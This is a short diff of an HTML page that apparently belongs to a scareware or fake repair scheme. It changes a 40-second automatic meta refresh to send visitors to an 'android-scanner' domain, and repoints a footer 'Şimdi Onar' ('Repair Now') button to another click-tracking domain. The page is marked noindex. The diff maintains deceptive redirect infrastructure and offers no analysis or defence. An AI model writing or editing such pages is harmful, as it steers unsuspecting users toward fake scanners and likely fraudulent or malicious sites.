--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 
 <head>
     <base href="">
-    <meta http-equiv="refresh" content="40; url=https://linkssharing.com/click.php?lp=1">
+    <meta http-equiv="refresh" content="40; url=http://android-scanner.ml/">
     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
     <meta name="robots" content="noindex, nofollow">
     <meta charset="utf-8">
@@ -155,7 +155,7 @@ a:after {
         </p>
         <footer>
             <br>
-            <p align="center"><a href="https://linkssharing.com/click.php?lp=1">Şimdi Onar</a></p>
+            <p align="center"><a href="https://pields-ladayeast.icu/click">Şimdi Onar</a></p>
         </footer>
         <br>
         <p class="text-center">
